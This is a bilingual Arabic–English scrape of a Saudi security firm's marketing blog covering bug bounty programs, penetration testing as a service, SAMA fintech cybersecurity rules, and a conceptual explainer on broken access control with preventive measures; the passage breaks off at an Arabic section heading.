ترست لاين تربط مجتمع الهاكرز المحترفين مع المنشآت لحمايتهم من خلال توفير منصة متكاملة تهدف لإجراء اختبار أمني مستمر وشامل لاصول هذه الشركات. توفر المنصة منهجية تسلسلية واضحة ابتداء من اكتشاف الثغرة، وحتى إغلاقها يمكن الإطلاع عليها من خلال لوحة تحكم متكاملة. تابعونا على منصات التواصل الاجتماعي&nbsp;<a href="https://twitter.com/TrustlineSec" rel="noopener noreferrer" tabindex="0">تويتر</a>، <a href="https://www.linkedin.com/company/trustlinesec/" rel="noopener noreferrer" tabindex="0">لينكد ان</a>، لمعرفة آخر التحديثات و&nbsp;<a href="https://www.trustline.sa/ar/contact-us" rel="noopener noreferrer" tabindex="0">تواصل</a><a href="mailto:info@trustline.sa" rel="noopener noreferrer" tabindex="0"> معنا</a> إذا كان عندك الرغبة لحماية منشاتك وإطلاق برامجك الخاصه.

استكشاف اختبار الاختراق وبرامج مكافآت الثغرات

Exploring-Pentesting-and-BugBounty

Pentesting, also known as penetration testing, and bug bounty programs are two critical approaches employed to enhance security. Despite their common goal of identifying vulnerabilities, they operate differently and offer unique benefits. This exploration will delve into the essence of pentesting, its various methodologies, and how it contrasts with bug bounty programs, providing insight into how they can be effectively integrated into cybersecurity strategies.

يُعد اختبار الاختراق، المعروف أيضًا باسم الاختبار الأمني، وبرامج مكافآت الثغرات، من الأساليب الذكية المستخدمة لتحسين أمن الأنظمة. على الرغم من هدفهما المشترك في تحديد الثغرات الأمنية، إلا أنهما يعملان بشكل مختلف ويقدمان فوائد فريدة. سنناقش في هذا المقال جوهر اختبار الاختراق، ومنهجياته المختلفة، وكيف يختلف ويتقاطع مع برامج مكافآت الثغرات، وطرق فعالة حول كيفية دمجها بكفاءة عالية في استراتيجيات الأمن السيبراني.

Exploring Pentesting and BugBounty

&nbsp;

In today&#39;s interconnected world, where technology permeates every aspect of our lives, cybersecurity has become an ever-present concern. The increasing sophistication of cyber-attacks pose significant challenges for organizations striving to safeguard their digital assets. In the battle to stay one step ahead of these threats. Companies partnered with the cyber security community and are launching bug bounty programs. But what exactly are bug bounty programs? How do they work, and how do they help improve a organization&#39;s overall security.

&nbsp;

<h2>What Exactly Is a Bug Bounty?</h2>

A bug bounty is a program offered by companies or organizations to incentivize individuals to find and report security vulnerabilities or bugs in their software or digital products. Bug bounties typically offer monetary rewards, prizes, or recognition to individuals or groups who discover and report previously unknown bugs or vulnerabilities in the company&#39;s software or system. The purpose of a bug bounty is to improve the security of the company&#39;s products and services by identifying and addressing potential security weaknesses before they can be exploited by malicious actors. Ethical Hackers around the world hunt bugs and, in some cases,&nbsp;earn full-time incomes. Bounty programs attract a wide range of hackers with varying skill sets and expertise giving businesses an advantage to work with talents around the world. Bounty programs often complement regular&nbsp;penetration testing&nbsp;and provide a way for organizations to test their applications&rsquo; security continuously and throughout their development life cycles.

&nbsp;

<h2>How Does a Bug Bounty Program Works?</h2>

Businesses starting bug bounty programs must first set the scope and budget for their programs. A scope defines what systems a hacker can test and outlines how a test is conducted. This allows them to implement security testing without compromising overall organizational efficiencies, and productivity.&nbsp;Bug bounty programs that offer competitive payouts send a clear message to its users and the hacking community, the company is committed to promoting vulnerability disclosure and prioritizing security above all. These programs establish reward structures that align with the severity of the discovered vulnerabilities, meaning that higher rewards are given for vulnerabilities with greater potential impact.&nbsp;Money isn&rsquo;t the hacker community&rsquo;s only motivation. Systems like&nbsp;leaderboards&nbsp;that credit hackers for discoveries help them build recognition.&nbsp;Once a hacker discovers a bug, they fill out a disclosure report that details exactly what the bug is, how it impacts the application, and what level of severity it ranks. The hacker includes key steps and details to help developers replicate and validate the bug. Once the developers review and confirm the bug, the company pays the bounty to the hacker.

&nbsp;

<h2>How Can I Set Up My Own Bug Bounty Program?</h2>

Traditionally, setting up a bug bounty program required companies to build their communication platform, implement bug tracking systems, triage received reports, integrate into payment gateways, and more. Now,&nbsp;setting up a bug bounty program&nbsp;is a simple process through Trustline. Trustline platform allows organizations to set their scope, track bug reports, received triaged report,s and manage payouts from one location.

&nbsp;

<h2>How Trustline Can Help:</h2>

Trustline utilizes the community of hackers to help keep businesses safe by providing an all-in-one platform to perform continuous and comprehensive security testing. The platform takes a streamlined approach to finding and remediating bugs while supporting everything in a single dashboard.

Trustline is the first crowdsourced security platform in the region. If you would like to keep up on the latest news, follow us on social media <a href="http://twitter.com/TrustlineSec">Twitter</a>, <a href="http://www.linkedin.com/company/trustlinesec/">LinkedIn</a>&nbsp;and <a href="mailto:info@trustline.sa">contact us</a> today to launch your first bug bounty program.

&nbsp;

&nbsp;

&nbsp;

&nbsp;

يشهد عالمنا المعاصر تقدماً تقنيا لم يسبق له مثيل، فقد أثرت التقنية على كل جانب من جوانب حياتنا اليومية، وأصبح كل شيء مرتبطاً بعضه ببعض. صاحب هذا التقدم هاجس كبير حول الأمن السيبراني حيث أن المخاطر السيبرانية يزيد حجمها وقدرها يوماً بعد يوم مما شكل تحديا حقيقياً للمنشآت التي تسعى لحماية بياناتها وأصولها الرقمية. ونتيجة لهذه التحديات بادرت المنشآت بأخذ خطوة استباقية للتغلب على التهديدات السيبرانية من خلال التحالف مع مجتمع الأمن السيبراني ممثلاً بالهاكرز الأخلاقيين (&nbsp;Ethical Hackers ) وإنشاء ما يسمى ب برامج مكافأة الثغرات ( Bug Bounty ). فما هي هذه البرامج؟ وما هي آلية عملها؟ وكيف من الممكن أن تساهم في رفع مستوى الأمان لدى الشركات؟

&nbsp;

<h2 dir="rtl">ما هي برامج مكافئة الثغرات&nbsp;؟</h2>

هي برامج تنشئها الشركات أو المنشآت لتحفيز الأشخاص إيجاد ثغرات أمنية على تطبيقاتهم أو أنظمتهم ثم الإبلاغ عنها. بوجهٍ عام هذه البرامج تقدم مكافئات مالية أو شهادات شكر للأشخاص الذين اكتشفوا ثغرة أمنية متواجدة في أنظمتهم لم يتم اكتشافها من قبل. الهدف من هذه البرامج رفع من مستوى أمان الشركة وحماية أصولها الرقمية من خلال الإبلاغ عن الثغرات قبل يتم استغلالها من قبل المجرمين السيبرانيين. الهاكرز الأخلاقيين في جميع أنحاء العالم يمارسون اصطياد الثغرات ( Bug Hunting ) على نحو مستمر، وفي بعض الحالات تكون هي عملهم ودخلهم الأساسي. برامج المكافئة تجذب الهاكرز الذين لديهم مهارات وخبرات متخصصة من جميع أنحاء العالم مما يعطي الشركات فرصة مميزة للاستفادة والعمل مع هذه المواهب الفريدة. برامج مكافئة الثغرات تكمل عمليات اختبار الاختراق فهي تقدم للمنشآت طريقة لفحص أصولهم الرقمية بشكل مستمر ومتكامل مع دورة حياة تطوير البرمجيات ( SDLC ).

&nbsp;

<h2 dir="rtl">ما هي آلية عمل برامج مكافئة الثغرات ؟</h2>

في البداية يجب على المنشاة التي تريد إنشاء برنامج تكافئ فيه الهاكرز الذين وجدو ثغرات على انظمتهم أن تحدد نطاق العمل ( Program Scope ) والميزانية المالية ( Bounty ) التي تريد استثمارها في البرنامج. نطاق العمل يوضح على نحو مختصر ما هي الأصول الرقمية التابعه للمنشاة التي يستطيع الهاكر اختباره. تسمح هذه الخطوة للشركات تنفيذ اختبارات أمنية بدون التأثير على إنتاجية الشركة. برامج مكافئة الثغرات التي توفر جوائز عالية تنافسية ترسل صورة واضحة لمستخدميها ومجتمع الأمن السيبراني أنها مهتمة في أمان تطبيقاتها، وأن حماية مستخدمينها هي الأولوية دائما. هذه البرامج توفر هيكلية للمكافآت المالية حيث تكون الثغرات الأكثر خطورة لها عائد مادي أفضل.المال ليس دائما هو المحفز الأول لصياد الثغرات لكثير من الهاكرز. منهم يتنافس ليتصدر لائحة المتصدرين ( Leaderboard ) ويصنع اسمه في المجال، والبعض يراها فرصة لتطوير مهاراته، والأخر تكون فرصة بنسبة له للتعرف على آخرين لديهم نفس الاهتمامات. بمجرد اكتشاف هاكر لثغرة في تطبيق او نظام معين يقوم بتعبئة نموذج يفصل فيه ما نوع الثغرة، وما أثرها، وخطورتها أيضا يضع خطوات تعطي المطور البرمجي تصوراً كامل عن كيفية استغلال الثغرة وما هي أفضل الممارسات لإصلاحها. بعد قيام المطور بمراجعة التقرير والتأكد من صحته تقوم الشركة دفع مكافئة مادية للهاكر لجهده وتعاونه.

&nbsp;

<h2 dir="rtl">كيف أنشئ برنامج مكافئة الثغرات يكون خاصاً لعملي ؟</h2>

في العموم إنشاء برنامج لمكافئة للثغرات يتطلب من الشركة بناء منصتهم الخاصة للتواصل مع الهاكرز، إنشاء نظام لتسجيل وتتبع الثغرات، المراجعة والتأكد من صحة التقارير التي تصلهم، الربط مع بوابة دفع و الكثير من الأمور الأخرى. في وقتنا الحالي أصبح إنشاء برامج مكافئة عملية سهلة باستخدام منصة ترست لاين. في ترست لاين نسمح للجهات بإنشاء برامج المكافئات الخاص بهم وتتبع جميع ثغراتهم الأمنية والوصول إلى أفضل الباحثين الأمنيين ومكافئتهم من خلال موقع واحد.

&nbsp;

<h2 dir="rtl">كيف ترست لاين تساعدك :</h2>

ترست لاين تربط مجتمع الهاكرز المحترفين مع المنشآت لحمايتهم من خلال توفير منصة متكاملة تهدف لإجراء اختبار أمني مستمر وشامل لاصول هذه الشركات. توفر المنصة منهجية تسلسلية واضحة ابتداء من اكتشاف الثغرة، وحتى إغلاقها يمكن الإطلاع عليها من خلال لوحة تحكم متكاملة. ترست لاين هي أول منصة اقتصاد تشاركي في مجال الأمن السيبراني في المنطقة، تابعونا على منصات التواصل الاجتماعي&nbsp;<a href="https://twitter.com/TrustlineSec">تويتر</a>، <a href="https://www.linkedin.com/company/trustlinesec/">لينكد ان</a>، لمعرفة آخر التحديثات و&nbsp;<a href="mailto:info@trustline.sa">تواصل معنا</a> إذا كان عندك الرغبة لحماية منشاتك وإطلاق برامجك الخاصه.

what-are-bug-bounties-how-do-they-work

In today's interconnected world, where technology permeates every aspect of our lives ..

شهد عالمنا المعاصر تقدماً تقنيا لم يسبق له مثيل، فقد أثرت التقنية على كل جانب من جوانب حياتنا اليومية

What Are Bug Bounties? How to Leverage Collective Power of the Hacker Community?

ماهي برامج مكافأة الثغرات و كيف لمنشأتي أن تستفيد من الباحثين الأمنيين؟

Pentests are an integral part of security. At the most basic level, they are required for compliance or validation, and are an industry best practice that supports good, routine security hygiene. But there&rsquo;s a lot of room for improvement. In the past, penetration testing was a contract-based, complex effort that organizations could not carry out more than 1-2 times per year. PTaaS enables organizations to perform a penetration test daily, or even after each code change. PTaaS facilitates more frequent testing across all environments.

<h2>What is Penetration Testing as a Service ( PTaaS )?</h2>

Penetration Testing as a Service (PTaaS) is an agile security methodology where your system is tested and scanned continuously to check if there are any security loopholes. It offers more frequent and cost-effective access to penetration tests and a platform that facilitates collaborations between penetration testers and client organizations. Organizations leverage PTaaS to detect and remediate vulnerabilities regularly.

<h2>How it Works?</h2>

Trustline Pentest helps organizations build resistance to cyberattacks in two ways. First by delivering high-quality pentest engagements with meaningful findings. This is achieved by carefully curating elite teams of pentesters from a community of hundreds of ethical hackers.Our community of pentesters consistently find critical vulnerabilities that others miss.Second, efficient testing reduces friction in the pentesting lifecycle. This is achieved through our SaaS-delivered engagement management software and services which orchestrate engagements, expose findings in real-time, and provide communication channels with the pentesters. We can launch a test in as little as few days, compared to 3-4 weeks for traditional pentests.

<h2>Benefits of Penetration as a Service :</h2>

Trustline Pentest aligns with modern software development methodologies. It offers speed, can easily integrate with your internal processes, and provides more visibility into potential security gaps.

Diverse Pentester Community

Companies tend to switch pentest vendors in the hopes that pentesters from different firms will provide different results and maximize their coverage. But vender evaluations is difficult and can be hard to know exactly what you&rsquo;re getting from a pentesting firm until they have performed the test. Avoid these challenges by taking advantage of Trustline large and diverse community.

Pentest as a Service Platform

SaaS platform for efficient scoping, pentest set-up, and program orchestration with custom and self-service capabilities. In addition to comprehensive view of all pentest programs with progress across phases of the engagements.

Workflows and SDLC Integrations

Trustline pentests plug into the processes and applications you&rsquo;re already using, like Slack to eliminate delays and ensure devops can respond quickly for faster remediation. Incoming reports are complete and comprehensive to enable reproducible results, and any retesting is included.

Speed of Delivery

Your SDLC moves fast and you need your pentests to keep up. Trustline pentests can be launched in as little as days. You can see results in just weeks. A team is selected based on your requirements and they communicate and collaborate with you as they search for and find vulnerabilities. If vulnerabilities are discovered, you&rsquo;re immediately alerted instead of waiting until the final report.

Process Transparency and Easy Communication

Trustline pentests are open, transparent, and flexible, offering interactive and engaging communication throughout the testing process. This gives you the ability to help remove testing roadblocks, get instant feedback and updates, and monitor the overall process. This direct feedback loop with testers encourages more effective testing and returns more reliable, higher quality results.

<h2>How Trustline Can Help :</h2>

Trustline Pentest helps organizations go beyond the status quo of &ldquo;check the box&rdquo; penetration testing. Organizations using Trustline Pentest benefit from fast, high quality actionable security outcomes with on-demand pentest as a service capabilities. Pentest is even more effective at keeping businesses safe when combined with Bugbounty, and VDP to minimize risk and elevate security <a href="mailto:info@trustline.sa">contact us </a>to know more about Trustline PenTest.

&nbsp;

يعتبر اختبار الاختراق ( Penetration Testing ) أحد المكونات الأساسية في حماية الأنظمة التقنية ابتداء من كونه أحد المتطلبات لتحقيق الامتثال للتشريعات السيبرانية وانتهاء بكونه أحد أفضل الممارسات للتحقق من أمان التطبيقات بشكل دوري. ورغم أهميته إلا أنه ما زالت هناك تحديات ومعوقات تواجهها المنشآت عند عمل اختبار الاختراق مما زاد من تكلفته، وأثر بشكل سلبي على جودته. فعلى سبيل المثال لا الحصر، تمر رحلة اختبار الاختراق التقليدي في بإجراءات معقدة وطويلة تستنزف من الشركات الوقت والجهد الكبير.ونتيجة لهذه الإشكاليات التي يعاني منها اختبار الاختراق التقليدي فقد ظهرت آلية جديدة للاختبار تهدف لتحسين جودة الاختبار وتسهيل إجراءاته. تعرف هذه الطريقة الجديدة باختبار الاختراق كخدمة ( Penetration Testing as a Service ) وهي آلية تمكن المنشآت من عمل اختبار اختراق بشكل دوري (أسبوعي أو يومي) مشكلا نقلة نوعية في تجربة العميل.

&nbsp;

&nbsp;

ما المقصود باختبار الاختراق كخدمة ( PTaaS ) :&nbsp;

اختبار الاختراق كخدمة هي منهجية حماية مرنة ( Agile ) حيث يتم اختبار التطبيقات والأنظمة بشكل دائم ومستمر للتأكد من عدم تواجد أي ثغرات أمنية. يقدم هذا النموذج فعالية من حيث التكلفة و الوصول السهل لطلب خدمة اختبار اختراق بشكل متكرر وفي أي وقت من خلال منصة تسهل وتحوكم التعاون ما بين قطاع الأعمال وأفضل الخبراء الأمنيين ومختبري الاختراق ( Penetration Tester ) تحديدا.

&nbsp;

&nbsp;

ما هي آلية عملها؟

في ترست لاين ، نساهم في حماية المنشآت ومساعدتها في الامتثال للتشريعات السيبرانية من خلال منتج ترست لاين بن تست (Trustline Pentest) والذي تتبيّن قيمته المضافة في نقطتين. الأولى، من خلال عمل اختبار اختراق بجودة عالية ومخرجات ممتازة والذي يساهم في تحقيق ذلك أنه يتم اختيار خبير اختبار الاختراق من مئات الخبراء المتميزين من مجتمع ترست لاين. الثانية، من خلال فعالية الاختبار وإيصال النتائج بشكل فوري لإصلاحها بسرعة والذي يساهم في تحقيق ذلك هي منصة ترست لاين التي من خلالها يمكن إدارة واكتشاف الثغرات، وكذلك تنظيم العمليات السيبرانية والاطلاع على النتائج على نحو متزامن وتوفير طرق للتواصل مع مختبري الاختراق. في ترست لاين يمكنك بدء عملية اختبار اختراق خلال أيام فقط مقارنة ب أسابيع في اختبار الاختراق بشكل تقليدي.

&nbsp;

&nbsp;

مميزات اختبار الاختراق ترست لاين :

اختبار الاختراق كخدمة متوافق مع مناهج تطوير البرمجيات الحديثة ( SDLC ). حيث يوفر سهولة في الربط و التكيف مع طريقة عمل المنشاة، السرعة في تقديم الطلب و البدء في الاختبار الامني، توفير النتائج بشكل اولي وتقديم رؤية واضحه للاخطار و الثغرات الامنية.

&nbsp;

- امكانيات ومواهب متنوعه في مجتمع من مختبرين الاختراق المتميزين&nbsp;:

المنشات على نحو عام تميل الى التعاقد مع الشركات التقليدية التي توفر خدمة اختبار الاختراق لأمل ان فعل ذلك قد يؤدي الى فحص و&nbsp;نتائج افضل في كشف عن ثغرات جديدة. لكن من الصعب تقييم مقدمين الخدمات والتاكد من جودة عملهم. يمكن تجنب هذه المشاكل من خلال ترست لاين حيث يتم توفير الية عمل واضحه و العمل مع افضل مختبرين الاختراق في سوق العمل.

&nbsp;

- منصة&nbsp;متكامله لاختبار اختراق كخدمة :

نموذج البرمجيات كخدمة التي تتبناها منصة ترست لاين توفر كفائة عاليه في اطلاق و ادارة اختبار الاختراق لجميع الانظمة المراد اختبارها من خلال لوحة تحكم توضح جميع عملياتك السيبرانية بتفاصيلها.

&nbsp;

- سير عمل افضل&nbsp;،&nbsp;مكمل لدورة حياة تطوير البرمجيات ( SDLC ) :

ترست لاين بن تست ( Trustline Pentest ) يمكن ربطه بسهوله بطريقة عمل المنشاة و التطبيقات المتواجدة في بيئة عملها على سبيل المثال سلاك ( Slack ). يساعد ذلك في التجاوب بشكل افضل ومساعدة فريق التطوير و التشغيل لاصلاح الثغرات المكتشفة بسرعة. التقارير التي تسلم في من خلال اختبار الاختراق تكون شامله و واضحه بحيث يسهل لفريق التطوير فهم المشكلة وحلها.

&nbsp;

- انتاجية افضل :

&nbsp;تطوير البرمجيات هي عملية التسارع فيها عالي ويجب لاختبار الاختراق ان يصبح كذلك. ترست لاين بن تست ( Trustline Pentest ) يمكن اطلاقه في خلال ايام والبدا برؤية النتائج خلال ساعات من الاطلاق. اثناء اكتشاف ثغره امنيه من قبل احد مختبرين الاختراق يصل تنبيه بشكل فوري في لوحة التحكم ( Dashboard ) لاصلاحها بشكل عاجل.

&nbsp;

- الية عمل واضحه :

&nbsp;ترست لاين بن تست (&nbsp; Trustline Pentest ) تتميز بالية عمل واضحه و مرنه و توفر وسيلة تواصل مباشره مع مختبرين الاختراق اثناء قيامهم في الفحص و عمل الاختبار. يوفر ذلك ميزه للشركات اذ ارادو التوضيح او التفصيل في نقطة ما وعلاج المشكله بشكل اسرع.

&nbsp;

&nbsp;

كيف&nbsp;ترست لاين&nbsp;تساعدك :

ترست لاين بن تست ( Trustline Pentest ) يساعد المنظمات للارتقاء لمستوى افضل اثناء العمل على اختبار اختراق و فحص تطبيقاتهم. اختبار الاختراق يكون اكثر فعالية في حماية المنشات عند جمعه مع برامج مكافئة و الكشف عن الثغرات. اذا اردت الاستفادة من هذه المميزات&nbsp;<a href="mailto:info@trustline.sa">تواصل معنا</a> و تابعنا على وسائل التواصل الاجتماعي&nbsp;<a href="https://twitter.com/TrustlineSec">تويتر</a> ، <a href="https://www.linkedin.com/company/trustlinesec/">لينكد ان</a> ليصلك الجديد.&nbsp;

Introduction-to-PTaaS

Pentests are an integral part of security. At the most basic level, they are required for compliance or validation ..

يعتبر اختبار الاختراق أحد المكونات الأساسية في حماية الأنظمة التقنية

Stay Ahead of Cyber Security Regulations with PenTest as a Service

امتثل لتشريعات الأمن السيبراني مع اختبار الاختراق كخدمة

The fintech industry in Saudi Arabia is experiencing exponential growth, revolutionizing financial services through technology-driven innovations. However, alongside this growth comes an amplified risk of cyberattacks, necessitating robust cybersecurity measures. Recognizing this, the Saudi Arabian Monetary Authority (SAMA) has established comprehensive cybersecurity regulations to protect financial institutions, including fintech companies.

&nbsp;

<h2>Understanding the Criticality of Cybersecurity for Fintech Companies:</h2>

Fintech companies, operating in a digital landscape, handle vast amounts of sensitive customer data and conduct financial transactions online. Consequently, they become prime targets for cybercriminals seeking to exploit vulnerabilities and gain unauthorized access to valuable assets. A successful cyberattack not only imposes severe financial repercussions but also undermines customer trust and disrupts the stability of the entire financial system. Complying with SAMA regulations is paramount to mitigating these risks and fostering a secure fintech ecosystem.

&nbsp;

<h2>SAMA Cybersecurity Framework (Safeguarding Financial Institutions):</h2>

The SAMA Cybersecurity Framework provides a comprehensive set of guidelines that financial institutions, including fintech companies, must adhere to in order to fortify their cybersecurity defenses. This framework encompasses various essential components, namely risk assessment, vulnerability assessment, penetration testing, and incident response. By diligently following these guidelines, fintech companies can proactively identify vulnerabilities, implement necessary safeguards, and effectively respond to potential cyber threats.

&nbsp;

<h2>How Trustline Supports Fintech Companies:</h2>

Trustline is at the forefront of assisting fintech companies in Saudi Arabia like Tamara, Dawul, Sukuk and others in the industry with their cybersecurity needs. Here&#39;s how Trustline can help:

<ul>
	<li>Vulnerability Disclosure Program : Trustline supports fintech companies through its Vulnerability Disclosure Program (VDP). VDP provides clear guidelines for external third parties to report security vulnerabilities, ensuring efficient and collaborative identification and mitigation of potential risks.</li>
	<li>Penetration Testing as a Service : Trustline sets itself apart in the field of penetration testing with its distinctive approach. We prioritize quick engagement initiation, leveraging a diverse community of pentesters to ensure comprehensive assessments. Through direct communication, we enable real-time discussions, while our commitment to timely vulnerability management ensures prompt remediation.</li>
	<li>Bug Bounty Program : Trustline offers a unique bug bounty program that goes beyond traditional approaches. We specialize in establishing and managing bug bounty programs that incentivize ethical hackers to proactively discover and report vulnerabilities. By tapping into a diverse community of security researchers, Trustline enables fintech companies to continuously identify and address emerging threats.</li>
</ul>

&nbsp;

If you are a fintech company in Saudi Arabia and you are looking for a cybersecurity company that can help you protect your systems and data from cyberattacks, then Trustline Cybersecurity is your trusted partner.

Trustline is the first crowdsourced security platform in the region. Through community of hackers, networks and applications can be tested and protected using the latest strategies and techniques. If you would like to keep up on the latest news, follow us on social media&nbsp;<a href="http://twitter.com/TrustlineSec">Twitter</a>,&nbsp;<a href="http://www.linkedin.com/company/trustlinesec/">LinkedIn</a>&nbsp;and&nbsp;contact us&nbsp;today to explore our offerings.

شهدت التقنية المالية في المملكة العربية السعودية نموًا كبيرا، حيث تغيرت قواعد اللعبة في مجال الخدمات المالية من خلال الابتكارات المدعومة بالتقنية الحديثة. ومع ذلك، صاحب هذا النمو زيادة من مخاطر الهجمات السيبرانية، مما يتطلب اتخاذ إجراءات أمنية قوية. ونتيجة لذلك، فقد أنشأت مؤسسة النقد العربي السعودي&nbsp;(SAMA)&nbsp;تشريعات شاملة للأمن السيبراني لحماية المؤسسات المالية، بما في ذلك شركات التقنية المالية.

&nbsp;

<h2 dir="rtl">أهمية الأمن السيبراني لشركات التقنية المالية:</h2>

تتعامل شركات التقنية المالية، التي تعمل في بيئة رقمية، مع كميات هائلة من البيانات الحساسة للعملاء وتجري المعاملات المالية عبر الإنترنت. ونتيجة لذلك، أصبحت أهدافًا رئيسية للمجرمين السيبرانيين الذين يبحثون عن استغلال الثغرات الأمنية السيبرانية والحصول على وصول غير&nbsp;مصرّح إلى المعلومات. حيث لا يسبب الهجوم الإلكتروني الناجح عواقب مالية فقط، بل يشتت أيضًا ثقة العملاء ويعطل استقرار النظام المالي بأكمله. لهذا يعد الامتثال لأنظمة&nbsp;SAMA&nbsp;أمر بالغ الأهمية في الحد من هذه المخاطر وتعزيز أمان التقنية المالية.

&nbsp;

<h2 dir="rtl">تشريعات عمل&nbsp;SAMA&nbsp;للأمن السيبراني (حماية المؤسسات المالية):</h2>

توفر تشريعات عمل&nbsp;SAMA&nbsp;للأمن السيبراني مجموعة شاملة من الإرشادات التي يجب على المؤسسات المالية، بما في ذلك شركات التقنية المالية، الالتزام بها من أجل تعزيز أمنها السيبراني. يشمل هذا الإطار مُختلف المكونات الأساسية، مثل تقييم المخاطر، وتقييم الثغرات الأمنية، واختبار الاختراق. من خلال اتباع هذه الأنظمة بدقة، يمكن لشركات التقنية المالية تحديد الثغرات الأمنية بشكل مسبق، وتعزيز التدابير الأمنية اللازمة، والرد بشكل فعّال على التهديدات السيبرانية المحتملة.

&nbsp;

<h2 dir="rtl">كيف&nbsp;ترست لاين تدعم&nbsp;شركات التقنية المالية:</h2>

تمكن&nbsp;ترست لاين مساعدة شركات التقنية المالية في المملكة العربية السعودية مثل&nbsp;تمارا&nbsp;،&nbsp;داول&nbsp;،&nbsp;صكوك&nbsp;وغيرها في احتياجاتها السيبرانية من خلال تقديم منتجات متخصصة في حماية الاصول الرقمية.

<ul dir="rtl">
	<li>برامج كشف الثغرات ( VDP ) : برامج توفر هيكلة و آليه عمل واضحة للأشخاص الذين يريدون التبليغ عن ثغرة أمنية تم إيجادها في أحد الأصول الرقمية التابعة لمنشاة</li>
	<li>اختبار الاختراق كخدمة ( PTaaS ): اختبار الاختراق كخدمة هي منهجية حماية مرنة ( Agile ) حيث يتم اختبار التطبيقات والأنظمة بشكل دائم ومستمر للتأكد من عدم تواجد أي ثغرات أمنية.</li>
	<li>برامج مكافأة الثغرات ( Bug Bounty ): برامج تنشئها الشركات أو المنشآت لتحفيز الأشخاص إيجاد ثغرات أمنية على تطبيقاتهم أو أنظمتهم ثم الإبلاغ عنها.</li>
	<li>&nbsp;</li>
</ul>

ترست لاين تساهم في رفع من مستوى الامان لدى المنشات من خلال ربطهم مع مجتمع من الباحثيين الامنيين حيث توفر منصة متكاملة تهدف لإجراء اختبار أمني مستمر وشامل لاصولهم الرقمية. إذا كنت ترغب في متابعة آخر الأخبار، يمكنك متابعتنا على وسائل التواصل الاجتماعي مثل <a href="https://twitter.com/TrustlineSec">تويتر</a> و<a href="https://www.linkedin.com/company/trustlinesec/">لينكد إن</a>، ويمكنك التواصل معنا للاطلاع على حلولنا.

How Hacker-Powered Security Can Help the Financial Sector Navigate the Regulations Challenge

كيف يمكن للأمن السيبراني المدعوم بالهاكرز أن يساعد القطاع المالي في التغلب على التشريعات التنظيمية

Hacker-Powered-Security-Can-Help-the-Financial-Sector

The fintech industry in Saudi Arabia is experiencing exponential growth. Consequently, they become prime targets for cybercriminals..

شهدت التقنية المالية في المملكة العربية السعودية نموًا كبيرا، حيث تغيرت قواعد اللعبة في مجال الخدمات المالية من خلال الابتكارات المدعومة بالتقنية الحديثة. ونتيجة لذلك، أصبحت أهدافًا رئيسية للمجرمين السيبرانيين..

<h2>Understanding Broken Access Control Vulnerabilities Definition and Significance</h2>

A broken access control vulnerability is a critical security flaw that allows unauthorized users to access, modify, or delete data they should not have access to. This issue arises when an application fails to enforce proper access controls, enabling attackers to bypass authorization and perform actions as if they were legitimate users. Recognized as one of the most severe web application security risks

<img alt="" src="/media/blog/2024/06/09/access-control.svg" style="height:461px; width:781px" />

it is listed as the top risk in the OWASP Top 10 list as of 2021.

&nbsp;

<h2>Forms of Broken Access Control</h2>

This vulnerability can manifest in various forms, including:

<ul>
	<li>Inadequate session management</li>
	<li>Improper enforcement of role-based access controls</li>
	<li>Insecure Direct Object References (IDOR)</li>
</ul>

Developers and security professionals must understand these risks and implement measures to mitigate them.

&nbsp;

<h2>Impact and Risk</h2>

The impact of broken access control can be devastating for organizations. Unauthorized access to sensitive data can result in:

<ul>
	<li>Data breaches</li>
	<li>Identity theft</li>
	<li>Financial loss</li>
	<li>Damage to reputation</li>
</ul>

In severe cases, it can lead to total system compromise, where attackers gain complete control over the system. This vulnerability jeopardizes the confidentiality, integrity, and availability of data, with the potential for attackers to access, modify, or delete any data on the system.

<img alt="" src="/media/blog/2024/06/09/broken-access-control.jpg" style="height:561px; width:872px" />

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;

<h2>Risk Assessment</h2>

<h2>The risk is particularly high for larger systems with sensitive data, as the consequences of unauthorized access can be significant. Organizations must prioritize identifying and addressing these vulnerabilities through regular security testing and continuous monitoring.</h2>

<h2>&nbsp;</h2>

<h2>Examples and Attack Types</h2>

1. URL Manipulation 
Attackers exploit URL manipulation by altering URLs to bypass access controls. For example, changing a URL from `http://example.com/user/123` to `http://example.com/user/456` can allow access to another user&rsquo;s data if the application doesn&rsquo;t verify access rights properly.

2. Exploiting Endpoints 
Endpoints, such as APIs or microservices, can be targeted if not secured. Attackers can discover unprotected endpoints and send unauthorized requests to access or manipulate data.

3. Elevating User Privilege 
Privilege escalation involves gaining unauthorized access to a low-level account and then increasing the account&rsquo;s privileges to access more sensitive data. For instance, an attacker might exploit weak passwords to access a user account and then elevate privileges to gain administrative access.

4. Insecure Direct Object References (IDOR) 
IDOR vulnerabilities occur when applications expose internal references, such as database keys, in URLs. Attackers can guess or brute-force these references to access sensitive data directly. For example, changing a URL to access different objects can exploit this vulnerability if access rights are not properly verified.

<h2>Preventive Measures</h2>

1. Principle of Least Privilege 
Implement the Principle of Least Privilege (PoLP) by granting users the minimum access necessary for their roles. Continuously review and update access permissions to align with current needs and organizational changes.

2. Secure Session Management and Authentication Controls 
Ensure secure session management by creating unique sessions for each user and destroying sessions after logout or inactivity. Implement strong authentication controls, including multi-factor authentication (MFA), to verify user identities and reduce the risk of unauthorized access.

3. Regular Access Control Audits and Reviews 
Conduct regular audits and reviews of access control systems to ensure policies are followed and identify security gaps. Revoke unnecessary access rights and monitor for suspicious behavior, such as repeated unauthorized access attempts. 
&nbsp;

By implementing these proactive measures, we can construct resilient defenses against access control vulnerabilities, safeguarding our valuable data. It is crucial to remember that security is a shared responsibility, and every step taken to enhance information security contributes to a more secure digital environment for all.

&nbsp;&nbsp;&nbsp;&nbsp;

<h2>تحصين بياناتك: فهم ثغرات ضعف التحكم بالوصول (Broken Access Control)</h2>

في عالم يعتمد بشكل متزايد على البيانات الرقمية الحساسة، يمثل ضمان أمن هذه البيانات أولوية قصوى. تبرز هنا ثغرة ضعف التحكم بالوصول (Broken Access Control) كتهديد كبير، إذ تسمح للمتطفلين بالولوج إلى معلومات لا يحق لهم الوصول إليها، مما يهدد سرية البيانات وسلامتها وتوافرها.

<h2>ماهي ثغرة ضعف التحكم بالوصول وكيف تؤثر على أمن المعلومات؟</h2>

